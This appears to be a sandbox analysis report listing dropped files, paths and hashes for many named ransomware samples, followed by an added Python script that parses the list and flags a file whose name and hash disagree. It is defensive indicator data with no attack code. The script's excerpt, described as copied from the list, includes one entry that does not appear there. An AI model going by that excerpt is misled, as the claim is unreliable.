Filesize 264KB
MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\a18bf5a0-6bd9-46b7-9a18-d7b9b74fb0d1.tmp
Filesize 70KB
MD5 e5e3377341056643b0494b6842c0b544
SHA1 d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256 e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA512 83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef
-
Filesize 16B
MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize 9KB
MD5 dc5ff60f1ead1537ef10084cb1769964
SHA1 daa5dd0442a3fd082af61d829ac213dafb42bb9d
SHA256 1a0b2a4559a55c78a7d74f9895808539d60cffdf1b5aa612ae10512947fff413
SHA512 45092c42023c476b1ee5c2deec41aaca9c544d081394bc12af3a0163574fa7c0b6ee00d2ac8d6e1d9ff7556dc4987534f5db824fcba3d30ba79ac36255872126
-
Filesize 7KB
MD5 0dde1deea3926c33c0e964ecb52b7173
SHA1 82bd4811c916b4d19852d245103fbabd9705679d
SHA256 560f4d9e722ebc6b32cdd23214c2d814d2666dc10ea3240d2c4e000ef04ab3db
SHA512 cd34b36ab2b36afd2ecb111722ad1ec22016d9e480df6b90594d50096ad1105d4e15ecb772fd181699e5c7e39076219b1aff3cbaaccabc6215d5c8efffe7bf47
-
Filesize 174B
MD5 e0fd7e6b4853592ac9ac73df9d83783f
SHA1 2834e77dfa1269ddad948b87d88887e84179594a
SHA256 feea416e5e5c8aa81416b81fb25132d1c18b010b02663a253338dbdfb066e122
SHA512 289de77ffbe328388ad080129b7460712985d42076e78a3a545124881c30f564c5ef8fb4024d98903d88a6a187c60431a600f6ecbbe2888ee69e40a67ce77b55
-
Filesize 1024KB
MD5 777dd969da3dd17026244668b774e058
SHA1 e0a066d28dfc6bcca1c13a50bfc4b35a37541b7a
SHA256 221f1bd7bad281fe93374736df606e52ce7393ae4fe0bdd4682935b90f184e59
SHA512 1f1a19b1a969a62cd8c83622e89077492457dd00f28505f0fe49a600688b18bf0407cae61e0da9f0d23fd0f6d874125fe83a5666ca7975976d612743fda08158
-
Filesize 7KB
MD5 77b65a77cac00fe47b16dd4819c4a4c7
SHA1 5d174cc05cfc487ee35db8aaa770930a26529bc0
SHA256 31aa3f7fa15dc18c49e4e36554fbaed761808284a0fa4a792a48e46d267e0383
SHA512 abcc320916161427a5b5683edd9242ad065680eee55f35b770e24c58f3ddb5b77bc1f58bc4c5fb851bec15b441a8de904a10dbb7eeaf6dcdf9460470d3d33d78
-
Filesize 1024KB
MD5 d6b130e951a42c547e09b5427476d4f6
SHA1 891b3b6c623b61d54fcb3b70ad7ec8464cac65f8
SHA256 0fcf035645c3fb2f683de1e0bfa1885e3d5a32c2e4125aac70bdc127fb44b935
SHA512 47460f3a19b49240995a4c60924b2428f1a166e43e3dbf376d3e334599fa7e4d339162868f6137fc2fdf722282d09705228d973e8ff5351f947d133eeffecf28
-
Filesize 7KB
MD5 e8dcf21ea94f3d01fa76f97c6a7cab93
SHA1 295cfe620e51da3f6b94aa971c589c605b7263eb
SHA256 99760809e09c86100ee137a6fa7e468fa37694af6563902cca113bc95b6ad145
SHA512 8a64ec1a739897a1e618e509ed7c16cae8ea3821b5adcc4a1ab1358b07701036d035381a78745aacb9fbc874629ddcc5645a8c2761b8fa930c0923147816281f
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\FWH0DPRU\microsoft.windows[1].xml
Filesize 97B
MD5 99d739ab815387d31c85e489a51495cd
SHA1 c0bcbc18d52c644f9f09f3989ffba0df482e068c
SHA256 da6f92552c98fab7e3e89eb0c21b90cf27a983973f993cb0d5c55927238690ac
SHA512 b352742864ea1047b90e56b50c34552b1fbe093cd7fc3344a8dfaa72632b0f54d33076e603942436a5443552e102416e2ad15c470aa3352408a14058d55c6cdf
-
Filesize 987KB
MD5 d5265e76d13e38eb1a431852432b35e4
SHA1 3b6c8d937cd4a767f5471eeb222db8394bc9438c
SHA256 444a6c5f95a50f9ab7e97fe914bc7704c6952cc105aa5c11c21eb7a15382a6c0
SHA512 9a7a1fed616384a0e910d12b270e15bdf0aa4e622f34074989ceae0e461c1b7b0b7cbd5c04fad96f40012294feb19e2c6b60feb112fc58f0f6d4668277ae46e4
-
Filesize 2.6MB
MD5 96957db0a8bfc0b0e44733b14b436191
SHA1 a0983b80a98d23d4cb0741be077ab60a6882e2d0
SHA256 13edf1c9c3ca671916716f4c48d1acbe1c6b9e43f2226fe4420fd52071fcfc03
SHA512 40278dd866097c6135950c6bd59722470bb15be537b2049a33338634506237f58be33f18875f4a42b3e021dab2317d691153750b80a9bd28e0bb8645cd76aac4
-
Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\cetrainers\CETD4CF.tmp\UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe
Filesize 196KB
MD5 808de473370ef6b5d98ab752f245a3ca
SHA1 800bd4ad10c17471829693fac3cee4502b14f029
SHA256 65cbed2e8db313b8966638e40eb27f94156c294eb060b28a02c130d146518c39
SHA512 fafaff03ad502523b3627e59e1026b8af4217a80215782a90667bc4f4c330871d8c3d890f2601b68ec9a42c0171d12b9e5b87067c95dcad1132b0a8979c56a4c
-
Filesize 11KB
MD5 0063d48afe5a0cdc02833145667b6641
SHA1 e7eb614805d183ecb1127c62decb1a6be1b4f7a8
SHA256 ac9dfe3b35ea4b8932536ed7406c29a432976b685cc5322f94ef93df920fede7
SHA512 71cbbcaeb345e09306e368717ea0503fe8df485be2e95200febc61bcd8ba74fb4211cd263c232f148c0123f6c6f2e3fd4ea20bdecc4070f5208c35c6920240f0
-
Filesize 24KB
MD5 640bff73a5f8e37b202d911e4749b2e9
SHA1 9588dd7561ab7de3bca392b084bec91f3521c879
SHA256 c1e568e25ec111184deb1b87cfda4bfec529b1abeab39b66539d998012f33502
SHA512 39c6c358e2b480c8cbebcc1da683924c8092fb2947f2da4a8df1b0dc1fdda61003d91d12232a436ec88ff4e0995b7f6ee8c6efbdca935eaa984001f7a72fea0a
-
Filesize 16KB
MD5 c8ffec7d9f2410dcbe25fe6744c06aad
SHA1 1d868cd6f06b4946d3f14b043733624ff413486f
SHA256 50138c04dc8b09908d68abc43e6eb3ab81e25cbf4693d893189e51848424449f
SHA512 4944c84894a26fee2dd926bf33fdf4523462a32c430cf1f76a0ce2567a47f985c79a2b97ceed92a04edab7b5678bfc50b4af89e0f2dded3b53b269f89e6b734b
-
Filesize 11KB
MD5 da979fedc022c3d99289f2802ef9fe3b
SHA1 2080ceb9ae2c06ab32332b3e236b0a01616e4bba
SHA256 d6d8f216f081f6c34ec3904ef635d1ed5ca9f5e3ec2e786295d84bc6997ddcaa
SHA512 bd586d8a3b07052e84a4d8201945cf5906ee948a34806713543acd02191b559eb5c7910d0aff3ceab5d3b61bdf8741c749aea49743025dbaed5f4c0849c80be6
-
Filesize 11KB
MD5 a4dd044bcd94e9b3370ccf095b31f896
SHA1 17c78201323ab2095bc53184aa8267c9187d5173
SHA256 2e226715419a5882e2e14278940ee8ef0aa648a3ef7af5b3dc252674111962bc
SHA512 87335a43b9ca13e1300c7c23e702e87c669e2bcf4f6065f0c684fc53165e9c1f091cc4d79a3eca3910f0518d3b647120ac0be1a68eaade2e75eaa64adfc92c5a
-
Filesize 328KB
MD5 ef81554c861acf96e5b9a61277838a01
SHA1 15200c8163840e47688271c18a5e611bf170e05b
SHA256 bc48e8ed0d9961d410984e8a4abc8870890bd0a7610d2db7a68ec15c651aec6b
SHA512 97909f2730130d53d3e70686e973fb81c95574fcb03b1075053ec9bf8bb6f91dcc223a98c1f726c4692e1f6e5e2a240f49eb2aa955fdde908ae587073fc23676
-
Filesize 9KB
MD5 0d45588070cf728359055f776af16ec4
SHA1 c4375ceb2883dee74632e81addbfa4e8b0c6d84a
SHA256 067c77d51df034b4a614f83803140fbf4cd2f8684b88ea8c8acdf163edad085a
SHA512 751ebf4c43f100b41f799d0fbf8db118ea8751df029c1f4c4b0daeb0fef200ddf2e41c1c9c55c2dc94f2c841cf6acb7df355e98a2e5877a7797f0f1d41a7e415
-
Filesize 174B
MD5 17d5d0735deaa1fb4b41a7c406763c0a
SHA1 584e4be752bb0f1f01e1088000fdb80f88c6cae0
SHA256 768b6fde6149d9ebbed1e339a72e8cc8c535e5c61d7c82752f7dff50923b7aed
SHA512 a521e578903f33f9f4c3ebb51b6baa52c69435cb1f9cb2ce9db315a23d53345de4a75668096b14af83a867abc79e0afa1b12f719294ebba94da6ad1effc8b0a3
-
Filesize 174B
MD5 a2d31a04bc38eeac22fca3e30508ba47
SHA1 9b7c7a42c831fcd77e77ade6d3d6f033f76893d2
SHA256 8e00a24ae458effe00a55344f7f34189b4594613284745ff7d406856a196c531
SHA512 ed8233d515d44f79431bb61a4df7d09f44d33ac09279d4a0028d11319d1f82fc923ebbc6c2d76ca6f48c0a90b6080aa2ea91ff043690cc1e3a15576cf62a39a6
-
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.MSIL.Agent.gen-a6787985243f50e272c98fe15b21f461f892e8905bbc5ffd7018ca2694bc5079.exe
Filesize 309KB
MD5 870fd3454e119ef7d325a73bb9fbdf61
SHA1 11c07a627e7ce13acbaafd11776b75e5bcb57d18
SHA256 a6787985243f50e272c98fe15b21f461f892e8905bbc5ffd7018ca2694bc5079
SHA512 3200f40fa5b8d328c8947eda31e66ee2a18e41154c030772074ee266770d47d79d8b3cf0e92ed5bb7975388ede0813d3c3e9ec5b4338dd1334af97f8821da64a
-
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.MSIL.Blocker.gen-186d9afa5f922ed9b4cb93853bd15496aeaf37d212f479c049fbd74c40d0b8af.exe
Filesize 2.1MB
MD5 46b09cfe0be5ac8aab7160322d803216
SHA1 2cf4dcbd0e74bfbcf0dd100bd3de844d6c4c43ba
SHA256 186d9afa5f922ed9b4cb93853bd15496aeaf37d212f479c049fbd74c40d0b8af
SHA512 3528045ba85f1086fcf2f7e9ee151dde265e54d8c71538802ce0720c6b1a3ad6b62acee4a9b9cb3a0a367d0ee00860a27a80f91d816fd4f01641cccad8f73c70
-
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.MSIL.Foreign.gen-4c8e0459524380a9f00ffc58913f461c3e1d8737dd18252881f09e2d416e4f73.exe
Filesize 9.7MB
MD5 ed50add120e6acbd68d9940c4037ef9d
SHA1 1b20bebb26b47ebcad25512740eb293620b63124
SHA256 4c8e0459524380a9f00ffc58913f461c3e1d8737dd18252881f09e2d416e4f73
SHA512 c31fc44e2dd4ba42f0c65ddb7cfbf25c2a44818bf99496a82b84d3c36c2a5f14caabcd8f90195007dcec94ff3e28a1c7a5d6f18fe92f991f697c77f04d121150
-
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.Win32.Blocker.gen-2cf41c6c7b120dca73fc1b0145406c190c5ea38edf5f349387a51184359e82e6.exe
Filesize 1.2MB
MD5 1293f2a7bae8b6232854fdb05c41bd58
SHA1 391fcedf2a12251884a7d380f9b9b1e6e652f8e2
SHA256 2cf41c6c7b120dca73fc1b0145406c190c5ea38edf5f349387a51184359e82e6
SHA512 76298ba5bbe9efe57a6e67841a9e297f53b08309e8ffb5dd980406e23d13bb92f21e2e37bc84b94a600407750343d8fb77dcb68960c8f0aba90387050c84abd5
-
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.Win32.Encoder.gen-ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29.exe
Filesize 201KB
MD5 434c9cea94668908bc6095ddc00b38df
SHA1 ecc2e452fb29bd800a7a21a9b5091d74963641c2
SHA256 ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29
SHA512 bfa07c580e2b87f2b6a0eddeedb320271a780f83ad8e9f612da2e7229ac5a54bbb690b605581a5300cc66eee1c8155e39c624fe6da64f4377f59f69309f2a083
-
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.Win32.Generic-ea0663308264d011ded742ebb145cea6be39193596654979bd5a9f16b380aea3.exe
Filesize 2.7MB
MD5 1de88eb91e168dbfc2bdec64c0522ea9
SHA1 c9d16703a81f5044455ebb8b4075782f7f0581d3
SHA256 ea0663308264d011ded742ebb145cea6be39193596654979bd5a9f16b380aea3
SHA512 05e5035431fbd7c7763dca2db38a200bc7914e2935a1630441c00c4d599cbf01d9695b3e0f391c19348e6ce98eaf683e47c6e9c78960559d4c082a2fcb374eb2
-
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.Win32.Makop.gen-9ddffccd20b4260116e889b979e21e772848a457cb6b17a2664a4ee12aa9199f.exe
Filesize 877KB
MD5 4f66694bd09060fa11e6b24ef7180c6b
SHA1 d60daf84ab9a6f2b955976fc24bf0fa88273367a
SHA256 9ddffccd20b4260116e889b979e21e772848a457cb6b17a2664a4ee12aa9199f
SHA512 b26e259570a1a948c85cf416a085247986b9982024d195eb962da1edc1be67b97fce1ad8db86569a7d3d9231b3a50fef972c840486691144fcb2610a1d96b49c
-
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe
Filesize 698KB
MD5 839609b011f03a293a0573ea5fb1277e
SHA1 fe48ac0a84e79bc2dd0024e55a62e86b077f8c12
SHA256 d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683
SHA512 526f6345e367950bc775213663fd68bd7bae2b82c71df70e8589dccc173da66af0171183c4abc4a102e45e151453ff8a8d67c2e4c8fcf72c54d85def22d37ac4
-
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exe
Filesize 397KB
MD5 8cf7b4a93013dc7726d05a3e56cd9167
SHA1 af9d193ed9ae5b4aa84bdc227b5a6116e26937be
SHA256 ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870
SHA512 556645b333f5170e610f9355cf7fa0afdb99e45b7f584eb8a5d3faaf2a50d84ca4c690a481c6ab718c9cbc5dcb278353b3e6682199ec0c216b8c1f8f7d5eb597
-
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Blocker.mvwo-8f4df1b11998017853ed5d0f009f461275cdd73f9c274d865fd11c36f6280118.exe
Filesize 2.5MB
MD5 148d216f156537381a7dbf6c85576628
SHA1 a7baeb6a146bc90f5a60a9e75d0b3281fdcefb47
SHA256 8f4df1b11998017853ed5d0f009f461275cdd73f9c274d865fd11c36f6280118
SHA512 b876ec36495df3d729e9984e6562c3110d2afd4c4945f8d1183340bb4eab8725acdfa7fcd96d2af460be21a2def997e21c7bfe100c9aba369acd9535a987d397
-
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Cryptor.edd-a39888f0df247072b57479e11d5536692035f10a8a2b18b5dd510a7d2fffcc3d.exe
Filesize 1.7MB
MD5 e7dac7353aedea59d7ff589a8c6ca5c3
SHA1 8a974ac76fb587855d488629944abfa1fb5822e3
SHA256 a39888f0df247072b57479e11d5536692035f10a8a2b18b5dd510a7d2fffcc3d
SHA512 1d614ef09db89fa5f218b57c6dc372f62d223dee14e599d93ef86c8e5deca067c7beafcf19f6fee7f408a193c167162c3ec3fe747ba0568a58444d7183c3b058
-
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Encoder.lqn-5fd1a714a3c72c00cc9cbcdf8f100c2e8e8e475354c8c582d1711e737c398423.exe
Filesize 2.3MB
MD5 67643493892a1d118708069dea7317cb
SHA1 97ad8e5c5807b71695a726ddc054619cb28b7237
SHA256 5fd1a714a3c72c00cc9cbcdf8f100c2e8e8e475354c8c582d1711e737c398423
SHA512 2a7683514fa2c7142920aa274718bc60ee8f1a4136e4552e429354a8201d513e07f294ccfe8c2f859e179e339e56ac4572ef7c593247411c9779a8b76382ea93
-
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Gimemo.besk-bcc15645592a6add5c91d3d097e63e8775b949be72de33fd7b06c5197c9a40fe.exe
Filesize 1.9MB
MD5 cec938aba350d8d70d79407ec5c148bd
SHA1 f92898a9b87c739ad6896472275b4f53e927df48
SHA256 bcc15645592a6add5c91d3d097e63e8775b949be72de33fd7b06c5197c9a40fe
SHA512 382fb2e4e6228e9f37a7717591908e805e1c098fac0d5b119004b744023ff7641f3a4ade8eb210ace45302d23296a521e24e9205f19b27122b64207d3486d077
-
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe
Filesize 436KB
MD5 f4f8696f22a4d908c027887166d8f8e0
SHA1 ddbb532c3d696493af2cbad98c722f592fc2f912
SHA256 e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd
SHA512 cadd2879ea3a88b7c18bb7bd43299ad0517790dacb3604d63a85a8373e26eb42a0d0b3aa9ec44a34daf1750b7adffea16320ac33086e7377e31ecf07b3c83d94
-
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Locky.bim-fb0f5ff4760f6869a63fc6ed01d19241d83919b88f70343473cb6af014fa8954.exe
Filesize 248KB
MD5 26bfc108ec961ea10ca20afce4594d95
SHA1 4dedb5288ee87a245a4bcfe9451675badb4f9106
SHA256 fb0f5ff4760f6869a63fc6ed01d19241d83919b88f70343473cb6af014fa8954
SHA512 648d27cd78b94e629b73955643b847265bc64aab45f57f21bd2d7be214986a8c714f78611421c18da2ba13fd3db634407450ffaa73d04dba2dc3e28b2c116b84
-
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Vega.ap-b7f96fbb9844cac5c7f4ec966683f3564bbb9a2f453927e1c579dcb0154f5f83.exe
Filesize 812KB
MD5 5181f541a6d97bab854d5eba326ea7d9
SHA1 16d9967a2658ac765d7acbea18c556b927b810be
SHA256 b7f96fbb9844cac5c7f4ec966683f3564bbb9a2f453927e1c579dcb0154f5f83
SHA512 c282d9d6479c10fcc9fa6f674c901df1f1ad94b9354f6e427a7b445d0efad84efed6d7c29a0bc2a37b5ea07ee9a359f0e922d7c24f061258ae11fe4c44e9e4fa
-
C:\Users\Admin\Desktop\00426\UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe
Filesize 5.6MB
MD5 362f5a087c17175ede18d1731a9a83f0
SHA1 fe7b4f0ebba453383bf10d7cd3b11dd8197796a1
SHA256 338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7
SHA512 d5d2c00e1208eb62450e17e239b9816f291bec9e0cb219d7162bd56df54d7d8c12c2926773537885eed21d46cd91a294dca84fa5649a77f1f1d7258e6ff5763b
-
Filesize 3KB
MD5 e219d6141d6864bd23bbc64fca39a8a8
SHA1 f55127d37f440ea8509be76acce97805cfade756
SHA256 73a693216763031fb5e9c6c915f4b0f735252601b7b649e948eac181ace79bf2
SHA512 dc550054bfaf06f2f47c22ccbc8b00a6361b731683184880bb88122cc4c8e9fbc186a271fd203bc96eddbbe02c5d1c41603b4fd5e6a95db77cd4eddd3fe17b0f
-
Filesize 129B
MD5 a526b9e7c716b3489d8cc062fbce4005
SHA1 2df502a944ff721241be20a9e449d2acd07e0312
SHA256 e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512 d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88
-
Filesize 203KB
MD5 b9314504e592d42cb36534415a62b3af
SHA1 059d2776f68bcc4d074619a3614a163d37df8b62
SHA256 c60c3a7d20b575fdeeb723e12a11c2602e73329dc413fc6d88f72e6f87e38b49
SHA512 e50adb690e2f6767001031e83f40cc067c9351d466051e45a40a9e7ff49049e35609f1e70dd7bb4a4721a112479f79090decca6896deac2680e7d107e3355dae
-
\??\c:\users\admin\desktop\00426\trojan-ransom.msil.blocker.aw-f4ca0ba460f6423e6168c27d45dc590bbd79774be4aee3804e0b5ec961ab97fa.exe
Filesize 684KB
MD5 2743eb749514cba78be4cb413a013357
SHA1 4360a36d62d45ddab595161154624f5b97a77bac
SHA256 f4ca0ba460f6423e6168c27d45dc590bbd79774be4aee3804e0b5ec961ab97fa
SHA512 d2b84c8edc8ffb12a6bf56309bd69a40f7bd3dbf13f26d1961a14d8cdbd9999db2f8fe9847b303095a004bd2998c3d4e671bcffb0cbf1522ff7eb70ab13b272f
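The dropped-file list above is mostly useful as a lookup table, and the sample names themselves carry a SHA-256 (the `<verdict>-<sha256>.exe` naming of the submitted set), which gives a cheap consistency check: a file whose name says one hash while the record says another is not the sample it is labelled as. One such case is already in the list: the copy under `Temp\cetrainers\CETD4CF.tmp\` is named for the Crypmod.xvk sample (`338dd780...`) but records SHA-256 `65cbed2e...` at 196KB, not the 5.6MB file on the desktop. The Python below is an added example, not part of the sandbox report or its tooling: it parses entries in the report's own flattened layout, indexes them by SHA-256, flags name/hash mismatches and matches a local file's bytes against the index. The excerpt it parses is copied from four entries above; the bytes fed to `lookup` are constructed and match nothing.

```python
"""Added example, not part of the sandbox report: parse 'Downloads' entries in the
layout used above ('-' separators, optional path line, Filesize/MD5/SHA1/SHA256/SHA512
labels fused to values) and cross-check the SHA-256 in each file name against the record."""
import hashlib
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s*([0-9A-Fa-f]+)$")
SIZE_RE = re.compile(r"^Filesize\s*(\S*)$")           # value may sit on the next line
EMBEDDED_SHA256_RE = re.compile(r"[0-9a-f]{64}", re.IGNORECASE)
EXPECTED_HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}


@dataclass
class DroppedFile:
    path: Optional[str] = None
    size: Optional[str] = None                         # report's own string, e.g. "196KB"
    hashes: Dict[str, str] = field(default_factory=dict)

    def embedded_sha256(self) -> Optional[str]:
        # SHA-256 carried in the file name ('<verdict>-<sha256>.exe' naming), if any
        if not self.path:
            return None
        m = EMBEDDED_SHA256_RE.search(self.path.rsplit("\\", 1)[-1])
        return m.group(0).lower() if m else None


def parse_downloads(text: str) -> List[DroppedFile]:
    entries: List[DroppedFile] = []
    cur = DroppedFile()                                # header text lands in a discarded entry
    size_on_next_line = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "-":                                # entry separator
            if cur.hashes:
                entries.append(cur)
            cur = DroppedFile()
            continue
        if size_on_next_line:
            cur.size, size_on_next_line = line, False
            continue
        m = SIZE_RE.match(line)
        if m:
            cur.size, size_on_next_line = m.group(1) or None, not m.group(1)
            continue
        m = HASH_RE.match(line)
        if m:
            algo, hexval = m.group(1), m.group(2).lower()
            if len(hexval) != EXPECTED_HEX_LEN[algo]:  # catches truncated or garbled digests
                raise ValueError(f"{algo} value has {len(hexval)} hex digits")
            cur.hashes[algo] = hexval
            continue
        cur.path = line                                # anything else is the path line
    if cur.hashes:
        entries.append(cur)
    return entries


def index_by_sha256(entries: List[DroppedFile]) -> Dict[str, DroppedFile]:
    return {e.hashes["SHA256"]: e for e in entries if "SHA256" in e.hashes}


def name_hash_mismatches(entries: List[DroppedFile]) -> List[DroppedFile]:
    """Entries whose file-name SHA-256 differs from the recorded digest: a same-named
    file with different content, so not the sample it is labelled as."""
    return [e for e in entries
            if e.embedded_sha256() and e.embedded_sha256() != e.hashes.get("SHA256")]


def lookup(index: Dict[str, DroppedFile], data: bytes) -> Optional[DroppedFile]:
    """Match a local file's bytes against the dropped-file index by SHA-256."""
    return index.get(hashlib.sha256(data).hexdigest())


# Constructed excerpt: four entries copied from the list above, in its own layout.
REPORT_EXCERPT = r"""Downloads
-
Filesize
935B
MD5f81c4131d0915c4a493d9f38bf907c2c
-
C:\Users\Admin\AppData\Local\Temp\cetrainers\CETD4CF.tmp\UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe
Filesize196KB
MD5808de473370ef6b5d98ab752f245a3ca
SHA1800bd4ad10c17471829693fac3cee4502b14f029
SHA25665cbed2e8db313b8966638e40eb27f94156c294eb060b28a02c130d146518c39
-
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.MSIL.Agent.gen-a6787985243f50e272c98fe15b21f461f892e8905bbc5ffd7018ca2694bc5079.exe
Filesize309KB
MD5870fd3454e119ef7d325a73bb9fbdf61
SHA256a6787985243f50e272c98fe15b21f461f892e8905bbc5ffd7018ca2694bc5079
-
C:\Users\Admin\Desktop\00426\UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe
Filesize5.6MB
MD5362f5a087c17175ede18d1731a9a83f0
SHA1fe7b4f0ebba453383bf10d7cd3b11dd8197796a1
SHA256338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7
SHA512d5d2c00e1208eb62450e17e239b9816f291bec9e0cb219d7162bd56df54d7d8c12c2926773537885eed21d46cd91a294dca84fa5649a77f1f1d7258e6ff5763b
"""

if __name__ == "__main__":
    for f in name_hash_mismatches(parse_downloads(REPORT_EXCERPT)):
        print(f"{f.path}\n  named  {f.embedded_sha256()}\n  actual {f.hashes['SHA256']}")
```

Run as a script it prints the cetrainers mismatch. `parse_downloads` takes the whole Downloads block pasted from a report, and the digest-length check rejects a hash that lost characters on the way, which is the usual failure when IOCs are lifted from a rendered page.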